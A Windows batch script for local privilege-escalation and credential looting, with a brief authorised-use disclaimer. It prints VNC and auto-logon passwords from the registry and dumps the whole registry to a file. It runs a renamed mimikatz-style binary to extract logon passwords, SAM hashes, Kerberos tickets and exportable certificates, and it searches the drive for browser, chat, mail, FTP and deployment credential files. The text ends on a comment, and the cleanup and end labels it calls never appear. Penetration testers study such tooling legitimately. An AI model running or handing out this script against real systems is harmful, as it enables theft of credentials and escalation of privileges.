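@echo OFF
REM Local "root loot" / privilege-escalation enumeration script for Windows.
REM It enumerates the host, prints any credentials it can find in the registry
REM and on disk and, when a jollykatz32.exe or jollykatz64.exe binary is
REM present, dumps logon secrets, SAM hashes, Kerberos tickets and certificates.
REM Only run this on systems you are authorised to test: it writes
REM registrydump.txt, dirlisting.txt, serviceexes.txt and any exported secrets
REM into the current directory, and it echoes cleartext passwords to the console.
REM
REM setlocal keeps every variable this script sets out of the parent cmd.exe
REM session, so values such as defaultloginpass never outlive the script even
REM if :cleanup is skipped. Delayed expansion is deliberately NOT enabled:
REM many banners below contain "!!!", which delayed expansion would eat.
setlocal
call:credits
call:CheckOSbitrate
call:CheckOSversion
call:checkprerequisitefiles

call:checkquickwins
call:getfirewallinformation
call:getcomputerinformation
call:dumphashespasseskerberoscerts
call:findinterestingfiles
call:findinterestingregistrykeys
call:findpasswords
call:checkweakpermissions
call:cleanup
goto end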
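:credits
REM Print the author banner. "echo." prints an empty line instead of the
REM "ECHO is off" message a bare echo would give.
echo.----------------------------------------------------
echo.Author: Jollyfrogs, Brisbane QLD
echo.A root loot script I used to learn batch techniques, needs TLC
echo.----------------------------------------------------
echo.
goto:eof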
:CheckOSbitrate
REM Sets OSbit to 64 when the ProgramFiles(x86) environment variable exists,
REM otherwise 32. The variable is taken as the marker of a 64-bit Windows
REM install; it says nothing about whether THIS cmd.exe is a 32-bit WoW64
REM process, which is what decides whether jollykatz64.exe can be loaded.
set OSbit=32
IF DEFINED ProgramFiles(x86) set OSbit=64
goto:eof
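:checkprerequisitefiles
REM Probe for optional tooling and for registry keys that later sections
REM report on. This only sets flag variables; nothing is printed except the
REM stderr noise of reg.exe and dir for keys and files that do not exist.
REM Flags set here: jollykatz, whoami, netshfirewall, alwaysinstallelevated,
REM the *found flags for the password stores, the *vncpassfound flags and
REM the winautologin* flags.
REM SOME OF THESE COMMANDS MIGHT GENERATE ERRORS SO WE CATCH THEM ALL HERE
echo ====================================================================
echo ====================== IGNORE THESE ERRORS =========================
REM NOTE: dir /s finds jollykatz in any subdirectory, but the later
REM invocations run it by bare name, so it must actually sit in the
REM current directory or on the PATH.
dir jollykatz%OSbit%.exe /a/s/b 1> nul 2> NUL
IF %ERRORLEVEL% == 0 set jollykatz=1
for /f "tokens=1 delims=" %%a in ('whoami') do set whoami=%%a
for /f "tokens=1 delims=" %%a in ('netsh /? ^| findstr \.*.irewal.*.*') do set netshfirewall=%%a

REM
REM check registry for the following registry entries:
REM
REM AlwaysInstallElevated is only exploitable when BOTH the HKLM and the HKCU
REM policy value are set. Find "0x1" is a loose match: 0x10 would match too.
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
IF %ERRORLEVEL% == 0 (
	reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
	REM Inside a parenthesised block a percent-expanded ERRORLEVEL is replaced
	REM when the block is parsed, so it would still hold the HKLM result.
	REM IF ERRORLEVEL is evaluated at run time and sees the HKCU result.
	IF NOT ERRORLEVEL 1 (set alwaysinstallelevated=1)
)
reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage" 1>NUL
IF %ERRORLEVEL% == 0 (set IE6found=1)
reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2" 1>NUL
IF %ERRORLEVEL% == 0 (set IE7found=1)
reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords" 1>NUL
IF %ERRORLEVEL% == 0 (set AIM6found=1)
reg query "HKCU\SOFTWARE\AIM\AIMPRO" 1>NUL
IF %ERRORLEVEL% == 0 (set AIMPROfound=1)
reg query "HKCU\SOFTWARE\Beyluxe Messenger" 1>NUL
IF %ERRORLEVEL% == 0 (set BEYLUXEfound=1)
reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting" 1>NUL
IF %ERRORLEVEL% == 0 (set BIGANTfound=1)
reg query "HKCU\SOFTWARE\Camfrog\Client" 1>NUL
IF %ERRORLEVEL% == 0 (set CAMFROGfound=1)
reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set GOOGLETALKfound=1)
reg query "HKCU\SOFTWARE\IMVU" 1>NUL
IF %ERRORLEVEL% == 0 (set IMVUfound=1)
reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application" 1>NUL
IF %ERRORLEVEL% == 0 (set NIMBUZZfound=1)
reg query "HKCU\SOFTWARE\Paltalk" 1>NUL
IF %ERRORLEVEL% == 0 (set PALTALKfound=1)
reg query "HKCU\SOFTWARE\Yahoo\Pager" 1>NUL
IF %ERRORLEVEL% == 0 (set YAHOOPAGERfound=1)
reg query "HKCU\SOFTWARE\IncrediMail" 1>NUL
IF %ERRORLEVEL% == 0 (set INCREDIMAILfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2013found=1)
reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2010POSTNTfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK2010PRENTfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK98MAILONLYfound=1)
reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts" 1>NUL
IF %ERRORLEVEL% == 0 (set OUTLOOK98NORMALfound=1)
reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites" 1>NUL
IF %ERRORLEVEL% == 0 (set DREAMWEAVERfound=1)
reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail" 1>NUL
IF %ERRORLEVEL% == 0 (set GMAILDESKTOPfound=1)
reg query "HKCU\SOFTWARE\DownloadManager\Passwords" 1>NUL
IF %ERRORLEVEL% == 0 (set IDMfound=1)
reg query "HKCU\SOFTWARE\Google\Picasa" 1>NUL
IF %ERRORLEVEL% == 0 (set PICASAfound=1)
reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set realvncpassfound=1)
reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set tightvncpassfound1=1)
reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" 1> NUL
IF %ERRORLEVEL% == 0 (set tightvncpassfound2=1)
reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set tigervncpassfound=1)
reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound1=1)
reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound2=1)
reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
IF %ERRORLEVEL% == 0 (set vnc3passfound3=1)
REM Winlogon auto-logon. The password is read into defaultloginpass only to
REM test that the value is non-empty, then cleared again immediately.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" 1> NUL
IF %ERRORLEVEL% == 0 (
	For /F "Tokens=2*" %%a In ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword') Do set defaultloginpass=%%b
	REM IF DEFINED is evaluated at run time. The previous percent-style
	REM comparison was expanded when this block was parsed, before the FOR
	REM above had run, so it always saw an empty value and never set the flag.
	IF DEFINED defaultloginpass set winautologinpassfound=1
	set defaultloginpass=
)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" 1> NUL
IF %ERRORLEVEL% == 0 (set winautologinuserfound=1)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" 1> NUL
IF %ERRORLEVEL% == 0 (set winautologindomainfound=1)
REM
REM
echo ====================== IGNORE THESE ERRORS =========================
echo ====================================================================
echo.
goto:eof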
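:CheckOSVersion
REM Sets OSVersion to a short tag: WIN7, WIN2008, WINVISTA, WIN2003, WINXP,
REM WIN2000, WINNT, WIN8, WIN10, WIN2012, WIN2016, WIN2019 or UNDETERMINED.
REM Legacy systems are recognised from the "ver" banner; anything else is read
REM from the "OS Name" line of systeminfo.
REM NOTE: the "ver" substring checks are loose: "2003" and "2000" can also
REM occur inside a build number. If "ver" prints only a numeric version, as
REM it may on Server 2003, the systeminfo branch below still classifies it.
REM Fixed: the fall-through used "goto warnthenexit", a label that does not
REM exist, which aborted the whole script on any OS newer than Windows 7.
ver | find "2003" > nul
if %ERRORLEVEL% == 0 goto ver_2003
ver | find "XP" > nul
if %ERRORLEVEL% == 0 goto ver_xp
ver | find "2000" > nul
if %ERRORLEVEL% == 0 goto ver_2000
ver | find "NT" > nul
if %ERRORLEVEL% == 0 goto ver_nt
if not exist "%SystemRoot%\system32\systeminfo.exe" goto versioncheckwarnthenexit
REM Parse systeminfo in-process instead of via a file under TEMP, so no
REM artefact is left behind and an unquoted TEMP path with spaces cannot break it.
set vers=
for /f "delims=: tokens=2" %%i in ('systeminfo ^| find "OS Name"') do set vers=%%i
echo %vers% | find "Windows Server 2003" > nul
if %ERRORLEVEL% == 0 goto ver_2003
echo %vers% | find "Windows 7" > nul
if %ERRORLEVEL% == 0 goto ver_7
echo %vers% | find "Windows Server 2008" > nul
if %ERRORLEVEL% == 0 goto ver_2008
echo %vers% | find "Windows Vista" > nul
if %ERRORLEVEL% == 0 goto ver_vista
echo %vers% | find "Windows Server 2012" > nul
if %ERRORLEVEL% == 0 goto ver_2012
echo %vers% | find "Windows Server 2016" > nul
if %ERRORLEVEL% == 0 goto ver_2016
echo %vers% | find "Windows Server 2019" > nul
if %ERRORLEVEL% == 0 goto ver_2019
echo %vers% | find "Windows 8" > nul
if %ERRORLEVEL% == 0 goto ver_8
echo %vers% | find "Windows 10" > nul
if %ERRORLEVEL% == 0 goto ver_10
goto versioncheckwarnthenexit
:ver_7
REM Run Windows 7 specific commands here.
set OSVersion=WIN7
goto versioncheckexit
:ver_8
set OSVersion=WIN8
goto versioncheckexit
:ver_10
set OSVersion=WIN10
goto versioncheckexit
:ver_2008
REM Run Windows Server 2008 specific commands here.
set OSVersion=WIN2008
goto versioncheckexit
:ver_2012
set OSVersion=WIN2012
goto versioncheckexit
:ver_2016
set OSVersion=WIN2016
goto versioncheckexit
:ver_2019
set OSVersion=WIN2019
goto versioncheckexit
:ver_vista
REM Run Windows Vista specific commands here.
set OSVersion=WINVISTA
goto versioncheckexit
:ver_2003
REM Run Windows Server 2003 specific commands here.
set OSVersion=WIN2003
goto versioncheckexit
:ver_xp
REM Run Windows XP specific commands here.
set OSVersion=WINXP
goto versioncheckexit
:ver_2000
REM Run Windows 2000 specific commands here.
set OSVersion=WIN2000
goto versioncheckexit
:ver_nt
REM Run Windows NT specific commands here.
set OSVersion=WINNT
goto versioncheckexit
:versioncheckwarnthenexit
set OSVersion=UNDETERMINED
goto:versioncheckexit
:versioncheckexit
goto:eof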
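:checkquickwins
REM Report the "quick win" findings flagged by :checkprerequisitefiles:
REM AlwaysInstallElevated, VNC passwords stored in the registry and Winlogon
REM auto-logon credentials. Each flag is cleared after it has been reported.
REM NOTE: the VNC and DefaultPassword values are printed in the clear, so
REM treat any captured console output as sensitive material.
REM The unreachable per-OS-version stub that used to follow the final
REM goto:eof has been removed, and with it the "systeminfo > systeminfo.txt"
REM scratch file it referred to; systeminfo is printed in full by
REM :getcomputerinformation.
	REM === Generic tests across all Windows versions here
	IF DEFINED alwaysinstallelevated (
		echo **** !!! VULNERABLE TO ALWAYSINSTALLELEVATED !!! ****
		set alwaysinstallelevated=
		echo.
	)
	IF DEFINED realvncpassfound (
		echo **** !!! REALVNC PASS FOUND !!! ****
		reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password"
		echo ************************************
		set realvncpassfound=
		echo.
	)
	IF DEFINED tightvncpassfound1 (
		echo **** !!! TIGHTVNC PASS FOUND !!! ****
		reg query HKLM\Software\TightVNC\Server /v Password | Find "Password"
		echo *************************************
		set tightvncpassfound1=
		echo.
	)
	IF DEFINED tightvncpassfound2 (
		echo **** !!! TIGHTVNC VIEWONLY PASS FOUND !!! ****
		reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly"
		echo **********************************************
		set tightvncpassfound2=
		echo.
	)
	IF DEFINED tigervncpassfound (
		echo **** !!! TIGERVNC PASS FOUND !!! ****
		reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password"
		echo *************************************
		set tigervncpassfound=
		echo.
	)
	IF DEFINED vnc3passfound1 (
		echo **** !!! VNC3 PASS FOUND !!! ****
		reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password"
		echo *********************************
		set vnc3passfound1=
		echo.
	)
	IF DEFINED vnc3passfound2 (
		echo **** !!! VNC3 PASS FOUND !!! ****
		reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password"
		echo *********************************
		set vnc3passfound2=
		echo.
	)
	IF DEFINED vnc3passfound3 (
		echo **** !!! VNC3 PASS FOUND !!! ****
		reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password"
		echo *********************************
		set vnc3passfound3=
		echo.
	)
	IF DEFINED winautologinpassfound (
		echo **** !!! WINDOWS AUTOLOGIN PASS FOUND !!! ****
		reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword"
		echo **********************************************

		IF DEFINED Winautologinuserfound (
			reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername"
			set winautologinuserfound=
		)

		IF DEFINED winautologindomainfound (
			reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname"
			set winautologindomainfound=
		)

		set winautologinpassfound=
	)
goto:eof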
:getfirewallinformation
REM Print the host firewall state and configuration via the legacy
REM "netsh firewall" context, when :checkprerequisitefiles found it.
REM NOTE(review): "netsh firewall" is the pre-Vista syntax; newer systems use
REM "netsh advfirewall" and may print a deprecation notice or less detail here.
echo.
IF NOT DEFINED netshfirewall (
	echo === NOTE: The netsh firewall command was not found, skipping checks ===
	echo.
	goto:eof
)
echo.
echo.Firewall Status
echo.---------------
netsh firewall show state
echo.
echo.
echo.Firewall configuration details
echo.------------------------------
echo.
netsh firewall show config
echo.
echo.
goto:eof
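:getcomputerinformation
REM General host enumeration: bitness, elevation, groups, local users,
REM systeminfo, listeners, scheduled tasks, services, drivers, a full
REM registry dump, environment variables and group policy. Everything goes
REM to the console except the registry dump, which goes to registrydump.txt.
echo.
echo.This computer is running %OSbit%-bit Windows
echo.
IF DEFINED whoami (
	echo.
	echo.Are we running an elevated command prompt?
	echo.------------------------------------------
	REM The High.Man pattern is meant to match the High Mandatory Level group
	REM an elevated token carries on Vista and later. XP and 2003 have no
	REM integrity levels, so this answers no there even for an Administrator.
	for /f "tokens=1 delims=" %%a in ('whoami /groups ^| findstr \.*High.Man') do set runningelevatedprompt=%%a
		IF DEFINED runningelevatedprompt (
				echo YES, we ARE!
			) ELSE (
				echo Sadly, no...
			)
		echo.
		echo.User Groups
		echo.-----------
		whoami /groups
		echo.
	) ELSE (
		echo === NOTE: The whoami command was not found, skipping checks ===
	)
echo.
echo.User Accounts
echo.-------------
net users
echo.
echo.Systeminfo
echo.----------
systeminfo
echo.
echo.Netstat -ano
echo.------------
netstat -ano
echo.
echo.Scheduled tasks
echo.---------------
schtasks /query /fo LIST /v
echo.
echo.Task to service mapping
echo.-----------------------
tasklist /SVC
echo.
echo.Network settings
echo.----------------
ipconfig /all
echo.
echo.Running windows services
echo.------------------------
net start
echo.
echo.Listing Windows drivers
echo.-----------------------
DRIVERQUERY
echo.
echo.Dumping Windows registry to registrydump.txt
echo.--------------------------------------------
REM Recursive dump of HKLM and HKCU. This is slow, the file can be very large
REM and it will contain secrets; :cleanup leaves it in place, so collect and
REM delete it yourself.
reg query HKLM /s > registrydump.txt
reg query HKCU /s >> registrydump.txt
echo.
echo.Environment variables
echo.---------------------
set
echo.
echo.Group Policy
echo.------------
REM Probe whether gpresult accepts /R, discarding both output streams.
REM The previous "1>2>NUL" form redirected stdout to a file literally named
REM "2" in the working directory and left stderr on the console.
gpresult /R >NUL 2>&1
IF %ERRORLEVEL% == 1 (
	REM WINXP
	gpresult
) ELSE (
	REM WIN7
	gpresult /R
)
echo.
REM ** ALEX TO ADD CREDENUMERATE **
goto:eof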
:dumphashespasseskerberoscerts
REM Run the bundled credential dumper, jollykatz32.exe or jollykatz64.exe as
REM chosen by OSbit. The command strings are mimikatz module syntax, so this
REM presumably is a renamed build; privilege::debug needs SeDebugPrivilege,
REM so an unelevated prompt yields little. The tickets and certificate
REM exports write files into the current directory and :cleanup does not
REM remove them.
echo.Hashes, passwords, kerberos tickets and certificates
echo.-----------------
IF NOT DEFINED jollykatz (
	echo === NOTE: Jollykatz%OSbit%.exe not found, skipping jollykatz checks ===
	goto:eof
)
echo.
echo.sekurlsa::logonPasswords full
echo.------
jollykatz%OSbit%.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
echo.
echo.lsadump::sam
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
echo.
echo.sekurlsa::tickets /export
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
echo.
REM One export per system store; the per-store commands are identical
REM apart from the store name, so they live in :exportcertstore below.
for %%s in (CERT_SYSTEM_STORE_CURRENT_USER CERT_SYSTEM_STORE_LOCAL_MACHINE CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE CERT_SYSTEM_STORE_USERS) do call:exportcertstore %%s
goto:eof

:exportcertstore
REM Export the "my" certificate store of the system store named by the
REM first argument, after making CAPI and CNG keys exportable.
echo.crypto::certificates /export (%1)
echo.------
jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:%1 /store:my /export" "exit"
echo.
goto:eof
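:findinterestingfiles
REM Build a flat listing of the system drive once, then grep it for files
REM that typically hold credentials or configuration worth reading: GPP XML,
REM unattend/sysprep answer files, VNC/SSH configs, browser, IM, mail and FTP
REM client stores, IIS logs and so on. Only paths are printed; nothing is
REM opened. The dirlisting.txt scratch file is left for :checkweakpermissions.
REM Changes: findstr reads dirlisting.txt directly instead of through a
REM "type |" pipe per pattern; the sysprep pattern had a stray "," where "."
REM was meant; two patterns that were listed twice now appear once.
echo.Interesting files and directories
echo.---------------------------------
REM SystemDrive is set by the OS, usually C:, so the sweep follows the
REM install drive instead of a hard-coded letter.
dir %SystemDrive%\* /a/s/b > dirlisting.txt
findstr /I \.*proof[.]txt$ dirlisting.txt
findstr /I \.*network-secret[.]txt$ dirlisting.txt
findstr /I \.*ssh.*[.]ini$ dirlisting.txt
findstr /I \.*ultravnc[.]ini$ dirlisting.txt
findstr /I \.*vnc[.]ini$ dirlisting.txt
findstr /I \.*bthpan[.]sys$ dirlisting.txt
findstr /I \.*\\repair$ dirlisting.txt
findstr /I \.*passw*. dirlisting.txt | findstr /VI \.*.chm$ | findstr /VI \.*.log$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$
findstr /I \.*[.]vnc$ dirlisting.txt
REM Group Policy Preference files; cpassword values in these are decryptable.
findstr /I \.*groups[.]xml$ dirlisting.txt
findstr /I \.*printers[.]xml$ dirlisting.txt
findstr /I \.*drives[.]xml$ dirlisting.txt
findstr /I \.*scheduledtasks[.]xml$ dirlisting.txt
findstr /I \.*services[.]xml$ dirlisting.txt
findstr /I \.*datasources[.]xml$ dirlisting.txt
findstr /I \.*.rsa.*[.].*$ dirlisting.txt | findstr /VI \.*.dll$ | findstr /VI \.*.rat$
findstr /I \.*.dsa.*[.].*$ dirlisting.txt | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ | findstr /VI \.*.gif$ | findstr /VI \.*.handsafe[.]reg$
findstr /I \.*[.]dbx$ dirlisting.txt
findstr /I \.*.account.*.$ dirlisting.txt | findstr /VI \.*.User.Account.Picture.*. | findstr /VI \.*.bmp$
findstr /I \.*ntds[.].*$ dirlisting.txt
findstr /I \.*hiberfil[.].*$ dirlisting.txt
findstr /I \.*boot[.]ini$ dirlisting.txt
findstr /I \.*win[.]ini$ dirlisting.txt
findstr /I \.*.\\config\\RegBack dirlisting.txt
findstr /I \.*.\\CCM\\logs dirlisting.txt
findstr /I \.*.\\iis.[.]log$ dirlisting.txt
findstr /I \.*.\\Content.IE.\\index.dat$ dirlisting.txt
findstr /I \.*.\\inetpub\\logs\\LogFiles dirlisting.txt
findstr /I \.*.\\httperr\\httpe.*.[.]log$ dirlisting.txt
findstr /I \.*.\\logfiles\\w3svc1\\ex.*.[.]log$ dirlisting.txt
findstr /I \.*.\\Panther\\ dirlisting.txt | findstr /VI \.*.Resources\\Themes\\.*.
REM Unattended-install answer files; these can carry local admin passwords.
findstr /I \.*.syspre.*[.]...$ dirlisting.txt
findstr /I \.*.unatten.*.[.]txt$ dirlisting.txt
findstr /I \.*.unatten.*.[.]xml$ dirlisting.txt
findstr /I \.*Login.Data$ dirlisting.txt
findstr /I \.*Web.Data$ dirlisting.txt
findstr /I \.*Credentials.Store$ dirlisting.txt
findstr /I \.*Credential.Store$ dirlisting.txt
findstr /I \.*Microsoft\\Credentials.* dirlisting.txt
REM Avant Browser:
findstr /I \.*forms[.]dat[.]vdt$ dirlisting.txt
findstr /I \.*default\\formdata\\forms[.]dat$ dirlisting.txt
REM Comodo Dragon
findstr /I \.*Dragon\\User.Data\\Default.* dirlisting.txt
REM CoolNovo
findstr /I \.*ChromePlus\\User.Data\\Default.* dirlisting.txt
REM Firefox
findstr /I \.*Firefox\\Profiles\\.*[.]default$ dirlisting.txt
findstr /I \.*key3[.]db$ dirlisting.txt
REM Flock Browser
findstr /I \.*Flock\\User.Data\\Default.* dirlisting.txt
REM Google Chrome
findstr /I \.*Chrome\\User.Data\\Default.* dirlisting.txt
findstr /I \.*Chrome.SXS\\User.Data\\Default.* dirlisting.txt
REM Internet Explorer: covered by the Microsoft\\Credentials pattern above.
REM Maxthon
findstr /I \.*MagicFill.* dirlisting.txt
findstr /I \.*MagicFill2[.]dat$ dirlisting.txt
REM Opera
findstr /I \.*Wand[.]dat$ dirlisting.txt
REM Safari
findstr /I \.*keychain[.]plist$ dirlisting.txt
REM SeaMonkey and ThunderBird share the signons.sqlite name.
findstr /I \.*signons[.]sqlite$ dirlisting.txt
REM AIM
findstr /I \.*aimx[.]bin$ dirlisting.txt
REM Digsby
findstr /I \.*logininfo[.]yaml$ dirlisting.txt
findstr /I \.*digsby[.]dat$ dirlisting.txt
REM Meebo Notifier
findstr /I \.*MeeboAccounts[.]txt$ dirlisting.txt
REM Miranda IM
findstr /I \.*Miranda\\.*[.]dat$ dirlisting.txt
REM MySpace IM
findstr /I \.*MySpace\\IM\\users[.]txt$ dirlisting.txt
REM Pidgin
findstr /I \.*Accounts[.]xml$ dirlisting.txt
REM Skype
findstr /I \.*Skype.*config[.]xml$ dirlisting.txt
REM Tencent QQ
findstr /I \.*Registry[.]db$ dirlisting.txt
REM Trillian
findstr /I \.*accounts[.]ini$ dirlisting.txt
REM XFire
findstr /I \.*XfireUser[.]ini$ dirlisting.txt
REM Foxmail
findstr /I \.*Account[.]stg$ dirlisting.txt
findstr /I \.*Accounts[.]tdat$ dirlisting.txt
REM Windows Live Mail
findstr /I \.*[.]oeaccount$ dirlisting.txt
REM FileZilla
findstr /I \.*recentservers[.]xml$ dirlisting.txt
REM FlashFXP
findstr /I \.*Sites[.]dat$ dirlisting.txt
REM FTPCommander
findstr /I \.*Ftplist[.]txt$ dirlisting.txt
REM SmartFTP
findstr /I \.*SmartFTP.*[.]xml$ dirlisting.txt
REM WS_FTP
findstr /I \.*ws_ftp[.]ini$ dirlisting.txt
REM Heroes of Newerth
findstr /I \.*login[.]cfg$ dirlisting.txt
REM JDownloader
findstr /I \.*JDownloader.* dirlisting.txt
findstr /I \.*database[.]script$ dirlisting.txt
findstr /I \.*accounts[.]ejs$ dirlisting.txt
REM OrbitDownloader
findstr /I \.*sitelogin[.]dat$ dirlisting.txt
REM Seesmic
findstr /I \.*data[.]db$ dirlisting.txt
REM SuperPutty
findstr /I \.*sessions[.]xml$ dirlisting.txt
REM TweetDeck
findstr /I \.*TweetDeck.* dirlisting.txt
findstr /I \.*[.]localstorage$ dirlisting.txt
echo.
goto:eof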
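:findinterestingregistrykeys
REM Dump the registry locations of known credential stores whose presence
REM :checkprerequisitefiles flagged. Values may be obfuscated rather than
REM cleartext; this only prints what is stored.
REM Source: securityxploded dot com slash passwordsecrets dot php
REM Fixed: the flags are environment variables and must be tested with
REM IF DEFINED. IF EXIST tests for a FILE of that name, so none of these
REM ever fired; the IncrediMail test also used the wrong flag name; and the
REM missing goto:eof made execution fall through into :findpasswords, which
REM then ran twice.
echo.Interesting registry keys
echo.-------------------------
IF DEFINED AIM6found (reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords")
IF DEFINED AIMPROfound (reg query "HKCU\SOFTWARE\AIM\AIMPRO")
IF DEFINED IE6found (reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage")
IF DEFINED IE7found (reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2")
IF DEFINED BEYLUXEfound (reg query "HKCU\SOFTWARE\Beyluxe Messenger")
IF DEFINED BIGANTfound (reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting")
IF DEFINED CAMFROGfound (reg query "HKCU\SOFTWARE\Camfrog\Client")
IF DEFINED GOOGLETALKfound (reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts")
IF DEFINED IMVUfound (reg query "HKCU\SOFTWARE\IMVU")
IF DEFINED NIMBUZZfound (reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application")
IF DEFINED PALTALKfound (reg query "HKCU\SOFTWARE\Paltalk")
IF DEFINED YAHOOPAGERfound (reg query "HKCU\SOFTWARE\Yahoo\Pager")
IF DEFINED INCREDIMAILfound (reg query "HKCU\SOFTWARE\IncrediMail")
IF DEFINED OUTLOOK2013found (reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook")
IF DEFINED OUTLOOK2010POSTNTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles")
IF DEFINED OUTLOOK2010PRENTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles")
IF DEFINED OUTLOOK98MAILONLYfound (reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts")
IF DEFINED OUTLOOK98NORMALfound (reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts")
IF DEFINED DREAMWEAVERfound (reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites")
IF DEFINED GMAILDESKTOPfound (reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail")
IF DEFINED IDMfound (reg query "HKCU\SOFTWARE\DownloadManager\Passwords")
IF DEFINED PICASAfound (reg query "HKCU\SOFTWARE\Google\Picasa")
echo.
goto:eof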
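:findpasswords
REM Grep config and text files for the usual credential keys. One
REM case-insensitive, recursive findstr with three literal patterns replaces
REM the three passes that each re-read every file; matching lines are
REM printed as file:line.
REM NOTE: the search is rooted at the current directory, not the system
REM drive, so pushd to the tree you want swept before calling this.
echo.Searching for passwords (this can take a while)
echo.-----------------------------------------------
findstr /si /C:"pwd=" /C:"password=" /C:"pass=" *.xml *.ini *.txt
goto:eof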
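:checkweakpermissions
REM Look for service executables and files or folders writable by
REM low-privilege groups, and for services whose configuration is writable.
REM Fixes over the original: the accesschk presence test was inverted, so
REM the accesschk checks were skipped exactly when accesschk.exe WAS present
REM and attempted when it was not; "1>2>NUL" sent stdout to a file literally
REM named "2"; the "(to verify!)" echo inside a block closed that block early;
REM and the final block was never closed at all.
echo.Searching for weak service permissions (this can take a while)
echo.--------------------------------------------------------------
if exist serviceexes.txt del serviceexes.txt
if exist dirlisting.txt del dirlisting.txt
REM "dir \" lists the CURRENT drive, which is not necessarily the system drive.
dir \ /a/s/b > dirlisting.txt
for /f "tokens=1 delims=," %%a in ('tasklist /SVC /FO CSV ^| findstr /I \.*exe*. ^| findstr /VI "smss.exe csrss.exe winlogon.exe services.exe spoolsv.exe explorer.exe ctfmon.exe wmiprvse.exe msmsgs.exe notepad.exe lsass.exe svchost.exe findstr.exe cmd.exe tasklist.exe"') do (findstr %%a$ | findstr /VI "\.*winsxs\\*.") <dirlisting.txt >> serviceexes.txt
REM In the line below we parse serviceexes.txt and check each line for write access. We check write access by appending (writing) nothing to the file, we then use batch logic to test results and output results in echo
REM for /f "tokens=*" %%a in (serviceexes.txt) do 2>nul (>>%%a echo off) && (echo === !!! RW access to service executable: %%a !!! ===) || (call)
REM Ninja magic to find out if we have write access, only partially reliable so decided to go with cacls instead
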